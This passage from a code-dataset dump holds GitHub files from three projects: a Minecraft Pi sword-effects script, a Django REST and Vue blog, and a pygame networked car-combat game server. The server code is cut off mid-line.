mc.player.getPos()\n# x, y, z = int(pos.x), int(pos.y), int(pos.z)\n#\n# # CREATE RECORD PLAYER\n# mc.setBlock(x, y, z + 2, block.CRAFTING_TABLE.id)\n# mc.setBlock(x, y + 1, z + 2, 96, 7)\n# # REMEMBER THE LIDS LOCATION\n# lid = Vec3(x, y + 1, z + 2)\n#\n# mc.setBlock(x - 1, y, z + 2, 49)\n# mc.setBlock(x - 1, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x + 1, y, z + 2, 47)\n# mc.setBlock(x + 2, y, z + 2, 49)\n# mc.setBlock(x + 2, y + 1, z + 2, block.NETHER_REACTOR_CORE.id, 2)\n# mc.setBlock(x - 1, y + 2, z + 2, block.OBSIDIAN.id)\n# mc.setBlock(x + 2, y + 2, z + 2, block.OBSIDIAN.id)\n#\n# record = recordPlayer(x, y, z)\n# hd = hitDetector()\n# hd.add_check(record.check_player)\n# hd.check_on()\n#\n# while True:\n# try:\n# sleep(1)\n# except KeyboardInterrupt:\n# record.quit_player()\n# sys.exit()\n" }, { "alpha_fraction": 0.5438057780265808, "alphanum_fraction": 0.5535714030265808, "avg_line_length": 41.66666793823242, "blob_id": "9c9c61650e68ed56f29a5f06d1173665e9c7e501", "content_id": "a954dfa93f0a45fdf6c903fdf66a6debc87f3c88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3584, "license_type": "no_license", "max_line_length": 121, "num_lines": 84, "path": "/swords/swords.py", "repo_name": "Cody-Coleman/minecraft-scripts", "src_encoding": "UTF-8", "text": "from mcpi.minecraft import Minecraft, Vec3\nfrom time import sleep\nfrom threading import Thread\n\n\nclass Sword:\n def __init__(self, address=\"localhost\", port=4711):\n self.mc = Minecraft.create(address, port)\n self.enable = False\n # Sword Types: 0 == Normal, 10 == Lava, 8 == Water, 79 == ice,\n self.sword_type = 'normal'\n\n def enable_sword(self):\n self.enable = True\n self.mc.events.clearAll()\n\n def disable_sword(self):\n self.enable = False\n\n def set_sword_type(self, sword_type):\n self.sword_type = sword_type\n\n def check_sword(self, hit_list):\n if self.enable:\n if self.sword_type == 'air':\n self.check_air_sword(hit_list)\n else:\n for hit in hit_list:\n hit_block_pos = hit.pos\n if self.sword_type == 'normal':\n pass\n elif self.sword_type == 'lava':\n self.mc.setBlock(hit_block_pos, 10)\n elif self.sword_type == 'water':\n self.mc.setBlock(hit_block_pos, 8)\n elif self.sword_type == 'ice':\n self.mc.setBlock(hit_block_pos, 79)\n\n def check_air_sword(self, hit_list):\n \"\"\"\n Checks the hit_list to see if it matches a block that is not air, and has nothing above it. If so will\n spin up a new thread to start that block floating up in the float_block function\n :param hit_list: a mcpi list of block hit data\n \"\"\"\n if self.enable:\n for hit in hit_list:\n hit_block_data = self.mc.getBlockWithData(hit.pos)\n hit_block_pos = hit.pos\n next_block_pos = Vec3(hit.pos.x, hit.pos.y + 1, hit.pos.z)\n next_block_data = self.mc.getBlockWithData(next_block_pos)\n if hit_block_data.id != 0 and next_block_data.id == 0:\n # self.mc.postToChat(\"Block found floating now\")\n t1 = Thread(target=self.float_block,\n args=(hit_block_pos, hit_block_data))\n t1.setDaemon(True)\n t1.start()\n break\n\n def float_block(self, hit_block_pos, hit_block_data):\n \"\"\"\n rotates between the hit block and the one above it, setting the one above to the same type as hit, the hit to air\n then assigning hit to that position, and next to one above that, looping 10 times\n :param hit_block_pos: The position of the hit block\n :param hit_block_data: The data of the hit block, used to set the air block above hit block to this\n :return:\n \"\"\"\n # self.mc.postToChat(\"Block found floating now\")\n for i in range(1, 10):\n next_block_pos = Vec3(hit_block_pos.x, hit_block_pos.y+1, hit_block_pos.z)\n # self.mc.postToChat(\"hit_block: {}\\nnext_block: {}\".format(hit_block_data.id, next_block_data.id))\n # Sets current block to Air\n self.mc.setBlock(hit_block_pos, 0)\n # Sets block above to the same type as the block that was hit\n self.mc.setBlock(next_block_pos, hit_block_data.id, 0)\n # sets the hit_block to the next_block position, and next block to one spot higher\n hit_block_pos = Vec3(next_block_pos.x, next_block_pos.y, next_block_pos.z)\n sleep(0.5)\n\n def __del__(self):\n \"\"\"\n Disable the sword / clean up any threads\n :return:\n \"\"\"\n self.disable_sword()\n" } ]
9
pyramidk/blog
https://github.com/pyramidk/blog
6d10a04cebea585a9a33f77ddcad39fd09e0910c
d1f86384d77919347c436cb1e9cc921e766075fe
cd0f321dc579f33c298601d53b23269ab58f1611
refs/heads/master
2020-03-07T00:30:33.939716
2018-07-10T08:14:48
2018-07-10T08:14:48
126,995,782
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7371428608894348, "alphanum_fraction": 0.7485714554786682, "avg_line_length": 15.4375, "blob_id": "7561ef238c0535cae9e51d623a0f730bcd989697", "content_id": "e31d1f9b198ed9da9e3446bc4bda7e5eac478a8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 525, "license_type": "no_license", "max_line_length": 58, "num_lines": 32, "path": "/README.md", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "# Pyramid-Blog\n\n> A blog created by python, django and vue.\n\n## Usage\n\nAbout the server\n\n``` bash\npython manage.py runserver\n```\n\nAbout the frontend\n\n``` bash\n# install dependencies\nyarn or npm install\n\n# serve with hot reload at localhost:8080\nyarn dev or npm run dev\n\n# build for production with minification\nnpm run build\n\n# build for production and view the bundle analyzer report\nnpm run build --report\n```\n\n## Screenshot\n![](blogproject/frontend/static/screenshot1.png)\n\n![](blogproject/frontend/static/screenshot2.png)" }, { "alpha_fraction": 0.6903515458106995, "alphanum_fraction": 0.6903515458106995, "avg_line_length": 31.609756469726562, "blob_id": "c849cdeaf92086f24ac36e3962fdf2f901a6631a", "content_id": "ba616b7a0d9d3545dd1fc727b5efe179306c300a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1337, "license_type": "no_license", "max_line_length": 77, "num_lines": 41, "path": "/blogproject/blog/views.py", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom .serializers import PostSerializers, CategorySerializers, TagSerializers\nfrom .models import Post, Category, Tag\n\n# Create your views here.\n@api_view(['GET'])\ndef index (request):\n if request.method == 'GET':\n post = Post.objects.all().order_by('-created_time')\n serializer = PostSerializers(post, many=True)\n # for non\n return JsonResponse(serializer.data, safe=False)\n\n@api_view(['GET'])\ndef category (request):\n if request.method == 'GET':\n category = Category.objects.all()\n serializer = CategorySerializers(category, many=True)\n print(serializer.data)\n return JsonResponse(serializer.data, safe=False)\n\n@api_view(['GET'])\ndef tag (request):\n if request.method == 'GET':\n tag = Tag.objects.all()\n serializer = TagSerializers(tag, many=True)\n print(serializer.data)\n return JsonResponse(serializer.data, safe=False)\n\n@api_view(['GET'])\ndef detail (request, pk):\n if request.method == 'GET':\n post = Post.objects.get(pk=pk)\n serializer = PostSerializers(post)\n return JsonResponse(serializer.data)\n" }, { "alpha_fraction": 0.7510373592376709, "alphanum_fraction": 0.7510373592376709, "avg_line_length": 47.20000076293945, "blob_id": "ba0c0f24e5cc9036106964ab022e3a1bb113f7c6", "content_id": "555003dc3f23f35ada40cbf4b631466313c98c42", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 241, "license_type": "no_license", "max_line_length": 58, "num_lines": 5, "path": "/blogproject/frontend/src/store/action-types.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "export const GET_BLOG_LIST = 'GET_BLOG_LIST'\nexport const GET_BLOG = 'GET_BLOG'\nexport const GET_BLOG_TAGS = 'GET_BLOG_TAGS'\nexport const GET_BLOG_CATEGORIES = 'GET_BLOG_CATEGORIES'\nexport const GET_ALL_CONTENT_DATA = 'GET_ALL_CONTENT_DATA'\n" }, { "alpha_fraction": 0.7554585337638855, "alphanum_fraction": 0.7554585337638855, "avg_line_length": 44.79999923706055, "blob_id": "ef9ec56ce1a25b90065edb55ef32356e2a31e824", "content_id": "207b27c55b9e6860eecc716addd1ea1c990abfc5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 229, "license_type": "no_license", "max_line_length": 56, "num_lines": 5, "path": "/blogproject/frontend/src/store/mutation-types.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "export const SET_BLOGS = 'SET_BLOGS'\nexport const SET_BLOG_DETAIL = 'SET_BLOG_DETAIL'\nexport const SET_BLOG_TAGS = 'SET_BLOG_TAGS'\nexport const SET_BLOG_CATEGORIES = 'SET_BLOG_CATEGORIES'\nexport const SET_LOADING = 'SET_LOADING'\n" }, { "alpha_fraction": 0.6725663542747498, "alphanum_fraction": 0.6725663542747498, "avg_line_length": 15.142857551574707, "blob_id": "0f17cb5cfd163c4ceff3e7e12d31040ad3220761", "content_id": "f68fe6e28db7be596ed78586fe7e257eb1122e11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 226, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/blogproject/frontend/src/store/index.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "import Vue from 'vue'\nimport Vuex from 'vuex'\nimport blog from './module/blog'\n\nVue.use(Vuex)\n\nconst debug = process.env.NODE_ENV !== 'production'\n\nexport default new Vuex.Store({\n modules: {\n blog\n },\n strict: debug\n})\n" }, { "alpha_fraction": 0.5482176542282104, "alphanum_fraction": 0.5530956983566284, "avg_line_length": 23.675926208496094, "blob_id": "c84f37cb231583bebf05be87ac331f46b7447b2b", "content_id": "8163512ea93904982f49359c798c1e39d75c2040", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 2665, "license_type": "no_license", "max_line_length": 68, "num_lines": 108, "path": "/blogproject/frontend/src/store/module/blog.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "import axios from 'axios'\nimport * as aTypes from '@/store/action-types'\nimport * as mTypes from '@/store/mutation-types'\n\nconst state = {\n data: 'store data',\n blogs: [],\n tags: [],\n categories: [],\n blogData: {},\n loading: true\n}\n\nconst actions = {\n [aTypes.GET_BLOG_LIST] ({ commit }) {\n return new Promise(async (resolve, reject) => {\n try {\n const res = await axios.get('/api/list/')\n if (res.status !== 200) return\n commit(mTypes.SET_BLOGS, { blogs: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n },\n [aTypes.GET_BLOG] ({ commit }, { blogId }) {\n return new Promise(async (resolve, reject) => {\n try {\n const res = await axios.get(`/api/list/${blogId}`)\n if (res.status !== 200) return\n commit(mTypes.SET_BLOG_DETAIL, { data: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n /* axios.get('/api/list/4').then(res => {\n console.log(res)\n commit(mTypes.SET_BLOG_DETAIL, { res })\n }) */\n },\n [aTypes.GET_BLOG_TAGS] ({ commit }) {\n return new Promise(async (resolve, reject) => {\n try {\n const res = await axios.get(`/api/tags`)\n if (res.status !== 200) return\n commit(mTypes.SET_BLOG_TAGS, { tags: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n },\n [aTypes.GET_BLOG_CATEGORIES] ({ commit }) {\n return new Promise(async (resolve, reject) => {\n try {\n const res = await axios.get(`/api/categories`)\n if (res.status !== 200) return\n commit(mTypes.SET_BLOG_CATEGORIES, { categories: res.data })\n resolve()\n } catch (err) {\n reject(err)\n } finally {\n }\n })\n },\n [aTypes.GET_ALL_CONTENT_DATA] ({ commit, dispatch }) {\n const tagPromise = dispatch(aTypes.GET_BLOG_TAGS)\n const catPromise = dispatch(aTypes.GET_BLOG_CATEGORIES)\n const blogPromise = dispatch(aTypes.GET_BLOG_LIST)\n\n Promise.all([\n tagPromise,\n catPromise,\n blogPromise\n ]).then(() => {\n commit(mTypes.SET_LOADING, { loading: true })\n })\n }\n}\n\nconst mutations = {\n [mTypes.SET_BLOGS] (state, { blogs }) {\n state.blogs = blogs\n },\n [mTypes.SET_BLOG_DETAIL] (state, { data }) {\n state.blogData = data\n },\n [mTypes.SET_BLOG_TAGS] (state, { tags }) {\n state.tags = tags\n },\n [mTypes.SET_BLOG_CATEGORIES] (state, { categories }) {\n state.categories = categories\n },\n [mTypes.SET_LOADING] (state, { loading }) {\n state.loading = loading\n }\n}\n\nexport default {\n state,\n actions,\n mutations\n}\n" }, { "alpha_fraction": 0.4579256474971771, "alphanum_fraction": 0.4618395268917084, "avg_line_length": 16.03333282470703, "blob_id": "cc74a8c2b86283d515b59ad84e93959977c49542", "content_id": "6abd91fd5401dc0d5a4f2df0472432fa197c919e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 519, "license_type": "no_license", "max_line_length": 38, "num_lines": 30, "path": "/blogproject/frontend/src/components/blog/mixins.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "export default {\n data () {\n return {\n }\n },\n computed: {\n state () {\n return this.$store.state.blog\n },\n tags () {\n return this.state.tags\n },\n categories () {\n return this.state.categories\n },\n collapseData () {\n return [{\n title: '分类',\n name: '1',\n isCollapse: true,\n collapseItems: this.categories\n }, {\n title: '标签',\n name: '2',\n isCollapse: true,\n collapseItems: this.tags\n }]\n }\n }\n}\n" }, { "alpha_fraction": 0.6433333158493042, "alphanum_fraction": 0.6433333158493042, "avg_line_length": 24.08333396911621, "blob_id": "17f11f5e1157931f40ed7a284e7b9e2f4e5b01f8", "content_id": "97c84a14e054b19485899916ef56f8146207e195", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 312, "license_type": "no_license", "max_line_length": 57, "num_lines": 12, "path": "/blogproject/blog/urls.py", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\n# 设置url命名空间\napp_name = 'blog'\n\nurlpatterns = [\n path('list/', views.index, name='index'),\n path('list/<int:pk>/', views.detail, name='detail'),\n path('categories/', views.category, name='category'),\n path('tags/', views.tag, name='tag')\n]" }, { "alpha_fraction": 0.6533575057983398, "alphanum_fraction": 0.6533575057983398, "avg_line_length": 29.66666603088379, "blob_id": "372b8f8f4db8d871454f404eb28fe157a8627c29", "content_id": "71171de1f87806a7ad62114190f21d223afd26df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 551, "license_type": "no_license", "max_line_length": 128, "num_lines": 18, "path": "/blogproject/blog/serializers.py", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\n\nfrom .models import Post, Category, Tag\n\nclass PostSerializers (serializers.ModelSerializer):\n class Meta:\n model = Post\n fields = ('id', 'title', 'body', 'img', 'created_time', 'modified_time', 'excerpt', 'authors_id', 'category_id', 'tags')\n\nclass CategorySerializers (serializers.ModelSerializer):\n class Meta:\n model = Category\n fields = ('id', 'name')\n\nclass TagSerializers (serializers.ModelSerializer):\n class Meta:\n model = Tag\n fields = ('id', 'name')" }, { "alpha_fraction": 0.6217391490936279, "alphanum_fraction": 0.6310558915138245, "avg_line_length": 26.288135528564453, "blob_id": "1dcfe987de4c524acaa44308c7fe2c958408a56f", "content_id": "3d1ac65afa01e1bd48e182707b005bdf27dafedb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1610, "license_type": "no_license", "max_line_length": 79, "num_lines": 59, "path": "/blogproject/frontend/src/common/video.js", "repo_name": "pyramidk/blog", "src_encoding": "UTF-8", "text": "class Video {\n constructor ({ container, video }) {\n this.container = container\n this.video = video\n this.init = this.init.bind(this)\n this.update = this.update.bind(this)\n }\n\n // set style\n _setStyle (element, style) {\n Object.keys(style).forEach(item => {\n element.style[item] = style[item]\n })\n }\n\n init () {\n this._setStyle(this.container, {\n 'position': 'relative',\n 'width': '100%',\n 'height': '100%',\n 'overflow': 'hidden',\n 'box-sizing': 'border-box'\n })\n this._setStyle(this.video, {\n 'position': 'absolute',\n 'top': '50%',\n 'left': '50%',\n 'transform': 'translate(-50%, -50%)',\n 'object-fit': 'cover' // fix the white space around video when fullscreen\n })\n }\n\n update () {\n const videoWidth = this.video.videoWidth\n const videoHeight = this.video.videoHeight\n const videoRatio = Number((videoWidth / videoHeight).toFixed(2))\n\n const containerStyles = window.getComputedStyle(this.container)\n const minWidth = parseInt(containerStyles.getPropertyValue('width'))\n const minHeight = parseInt(containerStyles.getPropertyValue('height'))\n\n const widthRatio = minWidth / videoWidth\n const heightRatio = minHeight / videoHeight\n\n let newWidth, newHeight\n if (widthRatio > heightRatio) {\n newWidth = minWidth\n newHeight = Math.ceil(newWidth / videoRatio)\n } else {\n newHeight = minHeight\n newWidth = Math.ceil(newHeight * videoRatio)\n }\n\n this.video.style.width = newWidth + 'px'\n this.video.style.height = newHeight + 'px'\n }\n}\n\nexport default Video\n" } ]
10
DavidZisky/deep_learning
https://github.com/DavidZisky/deep_learning
056ddf992d0082e321f79b9945d0b8284c7ed61b
e7f0cc27f9c83d2256a9978684c5e20ec8a840db
f7dcb285a0efc6969f8b277c8f8dd46ea316e981
refs/heads/master
2021-08-20T09:28:32.371475
2017-11-28T20:02:16
2017-11-28T20:02:16
112,382,233
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6835871338844299, "alphanum_fraction": 0.6920473575592041, "avg_line_length": 31.83333396911621, "blob_id": "1f8ed1b3adfdfcde289dac705d8b43ca8b9f1777", "content_id": "c5ef1076ca0ecbcff2a3c22e153db9b1cf6df821", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 591, "license_type": "no_license", "max_line_length": 62, "num_lines": 18, "path": "/ClassifyNB.py", "repo_name": "DavidZisky/deep_learning", "src_encoding": "UTF-8", "text": "def classify(features_train, labels_train):\n ### import the sklearn module for GaussianNB\n ### create classifier\n ### fit the classifier on the training features and labels\n ### return the fit classifier\n\n ### komentarz\n # nowy kom\n\n ### your code goes here!\n from sklearn import tree\n from sklearn.naive_bayes import GaussianNB\n from sklearn.svm import SVC\n #from sklearn.naive_bayes import GaussianNB\n #clf = tree.DecisionTreeClassifier(min_samples_split=2)\n clf = SVC(gamma=3, C=500)\n data = clf.fit(features_train, labels_train)\n return data\n" } ]
1
vhawley/paradigms-final
https://github.com/vhawley/paradigms-final
eb896cd677e5beb9c94f8c877ba777a8e17e5833
9e29d461a7d9da13776adf724037823a20a5ef8b
47c0a45ef1a0f9d3b14703fb07af393b5785b529
refs/heads/master
2021-01-20T06:56:53.647645
2015-05-06T18:40:53
2015-05-06T18:40:53
34,129,359
0
1
null
2015-04-17T17:07:21
2015-05-02T23:36:00
2015-05-03T01:50:54
Python
[ { "alpha_fraction": 0.6128600239753723, "alphanum_fraction": 0.6383121013641357, "avg_line_length": 33.150325775146484, "blob_id": "1f4cd58f71afd72a37205946f7c9be8be1bd5eba", "content_id": "24ca8e1684d0651f06fab6d031db93e5af7ca627", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10451, "license_type": "no_license", "max_line_length": 179, "num_lines": 306, "path": "/server.py", "repo_name": "vhawley/paradigms-final", "src_encoding": "UTF-8", "text": "from twisted.internet.protocol import Factory\nfrom twisted.internet.protocol import ClientFactory\nfrom twisted.protocols.basic import LineReceiver\nfrom twisted.internet import reactor\n\nimport sys\nimport os\nimport thread\n\nimport pygame\nfrom math import *\nfrom pygame.locals import *\n\nimport random\n\nclass Player(pygame.sprite.Sprite):\n\tdef __init__(self, gs=None, number=0, x=0, y=0, angle=0):\n\t\tself.gs = gs\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.angle = angle\n\t\tself.collisionangle = self.angle\n\t\tself.number = number\n\t\tself.speed = 0\n\t\tself.acceleration = 3\n\t\tself.maxspeed = 8\n\t\tself.maxhealth = 32.0\n\t\tself.health = self.maxhealth\n\t\tself.hit = 0\n\t\tself.powerup = -1\n\t\tself.poweruptimer = 0\n\n\tdef tick(self):\n\t\t#self.powerupimages = [\"doubledamage.png\", \"health.png\", \"invuln.png\", \"speed.png\"]\n\t\tif (not self.powerup == -1):\n\t\t\tif self.poweruptimer <= 0:\n\t\t\t\tself.powerup = -1\n\t\t\t\tself.maxspeed = 8\n\t\t\t\tself.acceleration = 3\n\t\t\telse:\n\t\t\t\tself.poweruptimer = self.poweruptimer - 1\n\t\t\t\tif self.powerup == 1:\n\t\t\t\t\tself.health = self.health + 10.0\n\t\t\t\t\tself.poweruptimer = 0\n\t\t\t\t\tself.powerup = -1\n\t\t\t\tif self.powerup == 3:\n\t\t\t\t\tself.maxspeed = 14\n\t\t\t\t\tself.acceleration = 5\n\t\t\t\t\n\t\tif (self.hit == 1):\n\t\t\tself.speed = self.speed - 0.75 * float(self.acceleration) / float(self.gs.tickrate)\n\t\t\tif (self.speed <= 0):\n\t\t\t\tself.hit = 0\n\t\t\tdeltax = self.speed * -1 * cos(radians(self.collisionangle))\n\t\t\tdeltay = self.speed * sin(radians(self.collisionangle))\n\t\t\tif (not (self.x + deltax > self.gs.width - 20 or self.x + deltax < 20)):\n\t\t\t\tself.x = self.x + deltax\n\t\t\tif (not (self.y + deltay > self.gs.height - 20 or self.y + deltay < 20)):\n\t\t\t\tself.y = self.y + deltay\n\n\t\telse:\n\t\t\tif (self.gs.keysheld[self.number][K_UP] == 1): #accelerate forward\n\t\t\t\tif (self.speed < 0):\n\t\t\t\t\tself.speed = min(self.speed + 2 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\t\telif (self.speed >= 0):\n\t\t\t\t\tself.speed = min(self.speed + float(self.acceleration) / float(self.gs.tickrate), self.maxspeed)\n\t\t\tif (self.gs.keysheld[self.number][K_DOWN] == 1): #brakes/reverse\n\t\t\t\tif (self.speed <= 0):\n\t\t\t\t\tself.speed = max(self.speed - float(self.acceleration) / float(self.gs.tickrate), -1 * self.maxspeed)\n\t\t\t\telif (self.speed > 0):\n\t\t\t\t\tself.speed = max(self.speed - 2 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\telif (self.gs.keysheld[self.number][K_UP] == 0): #slow down\n\t\t\t\tif (self.speed < 0):\n\t\t\t\t\tself.speed = min(self.speed + 0.75 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\t\telif (self.speed > 0):\n\t\t\t\t\tself.speed = max(self.speed - 0.75 * float(self.acceleration) / float(self.gs.tickrate), 0)\n\t\t\tif (self.gs.keysheld[self.number][K_LEFT] == 1): #turn left\n\t\t\t\tif (self.speed >= 0):\n\t\t\t\t\tself.angle = (self.angle + 3) % 360\n\t\t\t\telse:\n\t\t\t\t\tself.angle = (self.angle - 3) % 360\n\t\t\t\n\t\t\tif (self.gs.keysheld[self.number][K_RIGHT] == 1): #turn right\n\t\t\t\tif (self.speed >= 0):\n\t\t\t\t\tself.angle = (self.angle - 3) % 360\n\t\t\t\telse:\n\t\t\t\t\tself.angle = (self.angle + 3) % 360\n\n\t\t\tdeltax = self.speed * -1 * cos(radians(self.angle))\n\t\t\tdeltay = self.speed * sin(radians(self.angle))\n\t\t\tif (not (self.x + deltax > self.gs.width - 20 or self.x + deltax < 20)):\n\t\t\t\tself.x = self.x + deltax\n\n\t\t\tif (not (self.y + deltay > self.gs.height - 20 or self.y + deltay < 20)):\n\t\t\t\tself.y = self.y + deltay\n\t\t\n\nclass Powerup:\n\tdef __init__(self, gs=None, number=0, x=0, y=0):\n\t\tself.gs = gs\n\t\tself.number = number\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.visible = True\n\nclass GameSpace:\n\tdef __init__(self, factory):\n\t\tself.factory = factory\n\t\tself.players = list()\n\t\tself.cars = [\"ambulance.png\", \"audi.png\", \"blackviper.png\", \"car.png\", \"minitruck.png\", \"minivan.png\", \"police.png\", \"taxi.png\", \"truck.png\"]\n\t\tself.powerupimages = [\"doubledamage.png\", \"health.png\", \"invuln.png\", \"speed.png\"]\n\t\tself.powerups = list()\n\n\tdef getDistanceDifference(self, p1, p2): # returns distance between two player cars in pixels\n\t\tdif = sqrt(pow(p1.x-p2.x,2) + pow(p1.y-p2.y,2))\n\t\treturn dif\n\n\tdef getAngleDifference(self, p1, p2): # returns mathematically difference of two car angles (in degrees)\n\t\treturn p1.angle - p2.angle\n\n\tdef getAngleOfImpact(self, p1, p2): # returns angle of straight line between two cars (in degrees)\n\t\treturn degrees(atan2(p1.y-p2.y, p1.x-p2.x))\n\n\tdef detectPowerup(self):\n\t\tfor player in self.players:\n\t\t\tfor powerup in self.powerups:\n\t\t\t\tif powerup.visible == True:\n\t\t\t\t\tif self.getDistanceDifference(player,powerup) <= 50:\n\t\t\t\t\t\tplayer.powerup = powerup.number\n\t\t\t\t\t\tplayer.poweruptimer = 600 #in ticks\n\t\t\t\t\t\tpowerup.visible = False\n\t\t\t\t\t\t\n\tdef numRemainingPlayers(self):\n\t\tcount = 0\n\t\tfor player in self.players:\n\t\t\tif player.health > 0:\n\t\t\t\tcount = count + 1\n\t\treturn count\n\n\tdef detectCollisions(self):\n\t\tfor i in range(0,len(self.players)-1):\n\t\t\tif (self.players[i].health <= 0):\n\t\t\t\tcontinue\n\t\t\tfor j in range(i+1,len(self.players)):\n\t\t\t\tif (self.players[j].health <= 0):\n\t\t\t\t\tcontinue\n\t\t\t\tdistance = self.getDistanceDifference(self.players[i],self.players[j])\n\t\t\t\tif (distance < 75): # maximum distance difference that could be collision\n\t\t\t\t\ttotalspeed = abs(float(self.players[i].speed + self.players[j].speed))\n\t\t\t\t\n\t\t\t\t\tif (totalspeed > 2 and self.players[i].hit == 0 and self.players[j].hit == 0):\n\t\t\t\t\t\tself.players[i].hit = 1\n\t\t\t\t\t\tself.players[j].hit = 1\n\t\t\t\t\n\t\t\t\t\t\tif (self.players[i].speed > self.players[j].speed):\n\t\t\t\t\t\t\tself.players[i].collisionangle = 360 - self.players[i].angle\n\t\t\t\t\t\t\tself.players[j].collisionangle = self.players[i].angle\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tself.players[i].collisionangle = self.players[j].angle\n\t\t\t\t\t\t\tself.players[j].collisionangle = 360 - self.players[j].angle\n\t\t\t\t\t\tif (self.players[i].powerup != 2):\n\t\t\t\t\t\t\tif (self.players[j].powerup == 0):\n\t\t\t\t\t\t\t\tself.players[i].health = self.players[i].health - max(1,2 * abs(self.players[j].speed))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.players[i].health = self.players[i].health - max(1,abs(self.players[j].speed))\n\t\t\t\t\t\tif (self.players[j].powerup != 2):\n\t\t\t\t\t\t\tif (self.players[i].powerup == 0):\n\t\t\t\t\t\t\t\tself.players[j].health = self.players[j].health - max(1,2 * abs(self.players[i].speed))\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tself.players[j].health = self.players[j].health - max(1,2 * abs(self.players[i].speed))\n\n\t\t\t\t\t\tself.players[i].speed = 0.5 * totalspeed\n\t\t\t\t\t\tself.players[j].speed = 0.5 * totalspeed\n\t\t\t\t\t\t\n\t\t\t\t\t\tsound = random.randint(1,4)\n\t\t\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\t\t\tclient.sendLine(\"SOUND,\" + str(sound))\n\t\t\t\t\t\t\n\t\t\t\t\n\tdef main(self):\n\t\t# 1) basic init\n\t\tpygame.init()\n\t\tself.debug = 0\n\t\tself.size = self.width, self.height = 1024, 768\n\n\t\tself.black = 0, 0, 0\n\n\t\t#self.screen = pygame.display.set_mode(self.size)\n\t\t\n\t\tself.trackedinputs = [K_UP, K_DOWN, K_LEFT, K_RIGHT]\n\t\t\n\n\t\t#get playernumber from server after connecting\n\t\tself.keysheld = list()\n\t\tfor player in self.players:\n\t\t\tself.keysheld.append(dict())\n\t\t\tfor key in self.trackedinputs:\n\t\t\t\tself.keysheld[player.number][key] = 0\n\t\tself.tickrate = 60\n\t\tself.counter = 0\n\t\n\t\t# 2) set up game objects\n\t\tself.clock = pygame.time.Clock()\n\n\n\t\t# 3) start game loop\n\t\twhile 1:\n\t\t\t# 4) regulate tick speed\n\t\t\tself.clock.tick(self.tickrate)\n\n\t\t\t# 6) ongoing behavior\n\t\t\tfor player in self.players:\n\t\t\t\tplayer.tick()\n\t\t\tif self.numRemainingPlayers() <= 1:\n\t\t\t\twinner = -1\n\t\t\t\tfor player in self.players:\n\t\t\t\t\tif player.health > 0:\n\t\t\t\t\t\twinner = player.number\n\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\tclient.sendLine(\"GAMEEND,\" + str(winner))\n\t\t\t\tbreak\n\t\t\tself.detectPowerup()\n\t\t\tself.detectCollisions()\n\t\t\t\t\n\t\t\t\n\t\t\tfor player in self.players:\n\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\tclient.sendLine(\"PLAYER,\" + str(player.number) + \",\" + str(player.x) + \",\" + str(player.y) + \",\" + str(player.angle) + \",\" + str(player.health) + \",\" + str(player.maxhealth))\n\n\t\t\tfor client in self.factory.clients:\n\t\t\t\tclient.sendLine(\"POWERUP,START\")\n\t\t\tfor powerup in self.powerups:\n\t\t\t\tif powerup.visible == True:\n\t\t\t\t\tfor client in self.factory.clients:\n\t\t\t\t\t\tclient.sendLine(\"POWERUP,\" + str(powerup.number) + \",\" + str(powerup.x) + \",\" + str(powerup.y))\n\t\t\tself.counter = self.counter + 1\n\t\t\tif (self.counter == 750):\n\t\t\t\tnewx = 40 + random.randint(0,self.width-80)\n\t\t\t\tnewy = 40 + random.randint(0,self.height-80)\n\t\t\t\tpoweruptype = random.randint(0,len(self.powerupimages)-1)\n\t\t\t\tself.powerups.append(Powerup(self, poweruptype, newx, newy))\n\t\t\t\tself.counter = 